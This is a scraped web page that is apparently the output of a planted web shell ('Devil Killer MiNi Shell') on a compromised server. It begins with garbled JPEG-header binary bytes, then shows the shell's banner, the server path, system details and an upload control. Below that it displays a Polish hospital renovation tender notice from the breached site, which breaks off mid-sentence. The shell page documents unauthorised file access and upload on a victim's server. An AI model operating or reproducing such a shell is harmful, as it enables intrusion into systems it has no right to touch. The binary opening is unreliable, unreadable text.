JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250520/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250520/0023979201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa i remont pomieszczeń, modernizacja systemu wentylacji i klimatyzacji w budynku A2 Szpitala Praskiego pw. Przemienienia Pańskiego w Warszawie w tym z dostarczeniem sprzętu medycznego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Praski p.w. Przemienienia Pańskiego Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 012298823</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Solidarności 67</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">03-401</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@szpitalpraski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.szpitalpraski.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa i remont pomieszczeń, modernizacja systemu wentylacji i klimatyzacji w budynku A2 Szpitala Praskiego pw. Przemienienia Pańskiego w Warszawie w tym z dostarczeniem sprzętu medycznego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f5924199-cdb1-4664-9e0d-30e65dfdac4c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00239792</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00052714/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa i remont pomieszczeń, modernizacja systemu wentylacji i klimatyzacji z dostarczeniem sprzętu medycznego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> KPOD.07.02-IP.10-0093/24.w ramach dofinansowania D.1.1.1 „Rozwój i modernizacja infrastruktury centrów opieki wysokospecjalistycznej i innych podmiotów leczniczych </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szpitalpraski.ezamawiajacy.pl/pn/szpitalpraski/demand/notice/public/current/list?USER_MENU_HOVER=currentNoticeList <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://szpitalpraski.ezamawiajacy.pl/pn/szpitalpraski/demand/notice/public/current/list?USER_MENU_HOVER=currentNoticeList</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">określone na platformie ONE PLACE https://szpitalpraski.ezamawiajacy.pl/pn/szpitalpraski/demand/notice/public/current/list?USER_MENU_HOVER=currentNoticeList</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zawarty w treści SWZ, w tym Załączniku nr 7 do SWZ (projekt umowy).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/15/PRZEBUDOWA_REMONT/KPO/2025/UE</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmie remont wszystkich pomieszczeń i przebudowę części pomieszczeń na III i IV piętrze, remont bloku operacyjnego na II piętrze, a także modernizację systemu wentylacji mechanicznej i klimatyzacji na bloku operacyjnym wraz z dostarczeniem sprzętu medycznego: kolumn chirurgiczno-anestezjologicznych (sala 1-8) - 16 szt., operacyjnych lamp sufitowych LED, 2-czaszowych, bezcieniowych (sala 1-8)- 9. szt, angiograf do embolizacji guzów jamy brzusznej 1 szt. oraz wykonaniem niezbędnych prac do jego poprawnego montażu oraz uruchomienia.<br/>Prace remontowo budowlane: zakres zamierzenia opisany został w Załączniku do SWZ _ Program Funkcjonalno Użytkowy, wraz z załącznikami. Projekt koncepcyjny obejmuje projektowane zmiany funkcjonalne (architektura). Rysunki koncepcyjne pokazują projektowany docelowy układ pomieszczeń. Przebudowa obejmować będzie wydzielenie łazienek pacjentów, zmianę układu funkcjonalnego niektórych pomieszczeń, przebudowę istniejących instalacji oraz budowę nowych instalacji, dostawę i instalację wybranego wyposażenia. Prace obejmowały będą m.in. wymianę stolarki okiennej i drzwiowej, wymianę wykładzin ściennych podłogowych, adaptacje ogólnobudowlane, instalacyjne sanitarne, elektryczne i teletechniczne,<br/>- obszar przebudowy i remontu obejmuje blok A2 – II, III i IV piętro Szpitala (lokalizacja wg projektu koncepcyjnego) oraz niezbędne adaptacje w zakresie wydzielenia i przebudowy szachtów oraz instalacji,<br/>- inwestycja ma na celu polepszenie standardu świadczenia usług zdrowotnych, zapewnienie odpowiednich warunków i komfortu leczenia.<br/>3) W ramach realizacji zadania inwestycyjnego Wykonawca zobligowany jest do:<br/>•	weryfikacji projektu koncepcyjnego pod kątem optymalizacji realizacji inwestycji,<br/>•	weryfikacji i dla własnych potrzeb opracowanie dodatkowej inwentaryzacji (w razie konieczności), <br/>•	uzyskania wszelkich uzgodnień, decyzji, opinii, opracowań, niezbędnych do realizacji inwestycji,<br/>•	opracowania wielobranżowej dokumentacji projektowej: projektu budowlanego, projektów wykonawczych i technologicznych, kosztorysów, przedmiarów, zestawienia kosztów zadania, specyfikacji wykonania i odbioru robót i innych opracowań niezbędnych do realizacji zadania,<br/>•	przygotowania zaplecza budowy,<br/>•	realizacji robót budowlanych wynikających z opracowanej dokumentacji projektowej, uzyskanych uzgodnień, decyzji, opinii i warunków technicznych,<br/>•	sprawowanie nadzoru autorskiego,<br/>•	opracowanie dokumentacji powykonawczej,<br/>•	uzyskanie decyzji dopuszczających zainstalowane urządzenia, przeprowadzenie prób szczelności i dopuszczenia instalacji i urządzeń,<br/>•	realizację pierwszego wyposażenia zgodnie z dokumentacją przetargową,<br/>•	przeprowadzenie odbiorów inwestorskich.<br/>Szczegółowy zakres zgodnie pozostałymi punktami części opisowej, wymaganiami zamawiającego oraz częścią rysunkową (koncepcją architektoniczną pokazującą projektowany układ pomieszczeń). <br/>Zakres określony w PFU należy czytać komplementarnie w odniesieniu do wszystkich poszczególnych rozdziałów łącznie oraz z załącznikami. Należy pamiętać, że poszczególne różne punkty programu uzupełniają się wzajemnie w zakresie opisania i wyjaśnienia zadania.<br/>wymagania odnoszące się do dostawy, sprzętu medycznego wraz kolumna chirurgiczno-anestezjologiczna - sala 1-8 16 szt., operacyjna lampa sufitowa LED, 2-czaszowa, bezcieniowa - sala 1-8 9. szt., angiograf do embolizacji guzów jamy brzusznej 1 szt. oraz wykonaniem niezbędnych prac do jego poprawnego montażu oraz uruchomienia, określają załączniki do SWZ (Opisy przedmiotu zamówienia – parametry sprzętu), <br/>- dostawy muszą być zrealizowane odpowiednim środkiem transportu i zabezpieczone na czas transportu,<br/>- oznakowanie dostarczonego sprzętu, instrukcje użytkowania, etykiety (oryginalne) muszą być sporządzone w języku polskim,<br/>- oferowany przedmiot zamówienia powinien być wyrobem fabrycznie nowym, dopuszczonym do obrotu na terenie UE, kompletnym oraz wolnym od wad technicznych i prawnych, a także posiadać nazwę producenta, niezbędne oznaczenia wymagane przepisami (CE), ponadto zarówno przedmiot zamówienia jak i oryginalne jego opakowanie musi zawierać wszelkie inne oznaczenia wynikające z aktualnie obowiązujących przepisów, o ile takie są wymagane,<br/>- wszelkie produkty pochodzące od konkretnych producentów, określają minimalne parametry jakościowe i cechy użytkowe jakim muszą odpowiadać sprzęty, aby spełniać wymagania stawiane przez Zamawiającego i stanowią wyłącznie wzorzec jakościowy przedmiotu zamówienia,<br/>- przez zapis dotyczący minimalnych wymagań parametrów jakościowych, Zamawiający rozumie wymagania towarów zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych producentów. Operowanie przykładowymi nazwami producenta, ma jedynie na celu doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania. Tak więc posługiwanie się nazwami producentów czy produktów ma wyłącznie charakter przykładowy. Zamawiający przy opisie przedmiotu zamówienia wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt, dopuszcza jednocześnie produkty równoważne o parametrach jakościowych i cechach użytkowych, co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych parametrach lub lepszych. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały lub urządzenia,<br/>- dla wyspecyfikowanych urządzeń podane parametry są wartościami minimalnymi, każdy sprzęt o parametrach lepszych, wyższych od wyspecyfikowanych spełnia wymagania określone przez Zamawiającego. Wszystkie urządzenia powinny spełniać wszelkie przepisy dot. prawa dopuszczenia do użytkowania w Polsce oraz posiadać stosowne dokumenty świadczące o spełnianiu wszystkich niezbędnych norm i wytycznych, które powinien spełniać w/w sprzęt przed dopuszczeniem go do użytkowania,<br/>- ilekroć w niniejszej SWZ (w opisie przedmiotu zamówienia) jest mowa o materiałach, urządzeniach, programach komputerowych, itp. z podaniem znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę, to przyjmuje się, że wskazaniom takim towarzyszą wyrazy „lub równoważne”. Oznaczenia i nazwy własne produktów służą wyłącznie do opisania minimalnych parametrów technicznych, które powinny spełniać te produkty. Kryteria oceny równoważności, o których mowa w art.99 ust.6 ustawy Pzp, zostały określone w opisie przedmiotu zamówienia,<br/>- wyposażenie stanowiące przedmiot zamówienia musi być fabrycznie nowe, należytej jakości, sprawne, wolne od wad fizycznych, jak również od jakichkolwiek wad prawnych i roszczeń osób trzecich, nie używane, nie powystawowe. Pod pojęciem fabrycznie nowy Zamawiający rozumie produkty wykonane z nowych elementów, bez śladu uszkodzeni, w oryginalnych opakowaniach producenta, np. z widocznym logo, symbolem produktu,<br/>- dostawa do wskazanego miejsca obejmuje wniesienie, montaż, instalację (podłączenie) oraz wszystkie inne koszty związane z wykonaniem przedmiotu zamówienia zgodnie z wymogami stawianymi przez Zamawiającego,<br/><br/>Zamawiający stosownie do art. 95 ust. 1 ustawy Pzp, określa obowiązek zatrudnienia na podstawie umowy o pracę osób wykonujących następujące czynności w zakresie realizacji zamówienia: wykonywania prac fizycznych przy realizacji robót budowlanych, operatorów sprzętu i prac fizycznych instalacyjno-montażowych oraz wszelkich prac rozbiórkowych i budowlanych opisanych w dokumentacji projektowej (za wyjątkiem osób wykonujących samodzielne funkcje techniczne w budownictwie),opisanych w dokumentacji projektowej (za wyjątkiem osób wykonujących samodzielne funkcje techniczne w budownictwie), objęte zakresem zamówienia;<br/>(obowiązek ten nie dotyczy sytuacji, gdy prace te będą wykonywane samodzielnie i osobiście przez osoby fizyczne prowadzące działalność gospodarczą w postaci tzw. samozatrudnienia, jako podwykonawcy).<br/><br/>Szczegółowy sposób dokumentowania zatrudnienia ww. osób, uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę wymagań, o których mowa w art. 95 ust. 1 ustawy Pzp oraz sankcji z tytułu niespełnienia tych wymagań, rodzaju czynności niezbędnych do realizacji zamówienia, których dotyczą wymagania zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób wykonujących czynności w trakcie realizacji zamówienia zawarte są w Projekcie Umowy.<br/><br/> WIZJA LOKALNA: zgodnie z art. 134 Ustawy Pzp Zamawiający informuje o konieczności dokonania przed złożeniem oferty wizji lokalnej miejsca realizacji przedmiotu zamówienia, w celu dokładnego zapoznania się z przedmiotem zamówienia przez Wykonawcę i oszacowania na jego własną odpowiedzialność, kosztów i ryzyk oraz pozyskania wszelkich danych jakie mogą okazać się niezbędne do prawidłowego przygotowania oferty. Dokonanie wizji lokalnej jest warunkiem koniecznym do złożenia oferty w niniejszym postępowaniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">39150000-8 - Różne meble i wyposażenie</p> <p class="mb-0">33100000-1 - Urządzenia medyczne</p> <p class="mb-0">24111500-0 - Gazy medyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Kryterium: Cena brutto zamówienia - waga 60 %<br/>2) Kryterium: - Doświadczenie Personelu Wykonawcy - waga 20 %<br/>3)	Kryterium: Termin udzielonej pełnej nieodpłatnej gwarancji na roboty budowlane - waga 10%,<br/>4)	Kryterium: Termin udzielonej pełnej nieodpłatnej gwarancji na sprzęt medyczny - waga 10%<br/><br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyska najwyższą liczbę punktów – „P”, gdzie P oznacza sumę uzyskanych punktów w kryteriach cena oraz termin realizacji: <br/>P = Cn + Do+ TnRB +TnS</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Personelu Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin udzielonej pełnej nieodpłatnej gwarancji na roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin udzielonej pełnej nieodpłatnej gwarancji na sprzęt medyczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> - posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, tj. w zakresie wykonywania robót budowlanych, w wysokości min.30.000.000,00 PLN lub równowartości tej kwoty. Dopuszczalna franczyza dla szkód rzeczowych i osobowych wynosi 10.000,00 PLN - posiada środki finansowe lub zdolność kredytową na kwotę min. 20.000.000,00 PLN lub równowartości tej kwoty -w okresie ostatnich 5 lat przed upływem terminu składania ofert, wykonał należycie co najmniej jedną robotę w formule „zaprojektuj i wybuduj”polegającą wykonaniu dokumentacji projektowej oraz wykonaniu budowy lub rozbudowy lub przebudowy budynku lub budynków szpitali i zakładów opieki medycznej (zaliczanego do klasyfikacji PKOB 1264) o wartości min.18.000.000 zł brutto -w okresie ostatnich 5 lat przed upływem terminu składania ofert wykonał należycie co najmniej jedną robotę budowlaną polegającą wykonaniu budowy lub rozbudowy lub przebudowy budynku lub budynków szpitali i zakładów opieki medycznej (zaliczanego do klasyfikacji PKOB 1264)o wartościmin.18.000.000 zł -w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie - zrealizował należycie co najmniej jedną dostawę sprzętu medycznego tożsamego z rodzajem sprzętu objętego przedmiotem zamówienia wraz z montażem, uruchomieniem adaptacją pomieszczeń na potrzeby o wartości łącznej min. 3.000.000,00zł brutto <br/>-dysponowanie min.1osobą wyznaczoną do pełnienia funkcjiKierownika Budowy, która: posiada uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności konstrukcyjno-budowlanej bez ograniczeń nabyte min.10 lat przed upływem terminu składania ofert, która jest członkiem właściwej izby samorządu zawodowego zgodnie z ustawą Prawo budowlane oraz ustawą o samorządach zawodowych architektów oraz inżynierów budownictwa oraz w okresie ostatnich 10 lat przed upływem terminu składania ofert pełniła funkcję kierownika budowy na co najmniej 2 (dwóch) robotach obejmujących budowę lub rozbudowę lub przebudowę budynku lub budynków szpitalnych lub zakładu opieki medycznej (wg Polskiej Klasyfikacji Obiektów Budowlanych należące do klasy 1264) o wartości robót budowlanych min.15.000.000 złbrutto, na każdej nieprzerwanie przez okres minimum 8 miesięcy, włącznie z dokonaniem wpisu do dziennika budowy o zakończeniu robót, w zakresie każdej roboty znajdowało się wykonanie co najmniej bloku operacyjnego (minimum 3 saleoperacyjne),brałudokumentowany udział przez okres co najmniej 18 miesięcy w robotach budowlanych przy zabytkach nieruchomych wpisanych do rejestru zabytków lub inwentarza muzealiów,<br/>-min.1osobą do pełnienia funkcji Kierownika robót elektrycznych która posiada uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych bez ograniczeń,nabyte min.10 lat przed upływem terminu składania ofert pełniła funkcję kierownika robót na co najmniej 1 robocie obejmującej budowę lub rozbudowę lub przebudowę budynku lub budynków szpitalnych lub zakładu opieki medycznej (wg Polskiej Klasyfikacji Obiektów Budowlanych należące do klasy 1264) o wartości robót budowlanych co najmniej 15.000.000 PLN brutto, nieprzerwanie przez okres minimum 8 m-cy, włącznie z dokonaniem wpisu do dziennika budowy o zakończeniu robót;<br/>-min. jedną osobą wyznaczoną do pełnienia funkcji Kierownika robót telekomunikacyjnych posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń nabyte min.10 lat przed upływem terminu składania ofert, która jest członkiem właściwej izby samorządu zawodowego oraz w okresie ostatnich 10 lat przed upływem terminu składania ofert pełniła funkcję kierownika robót na co najmniej 1 robocie obejmującej budowę lub rozbudowę lub przebudowę budynku lub budynków szpitalnych lub zakładu opieki medycznej (wg Polskiej 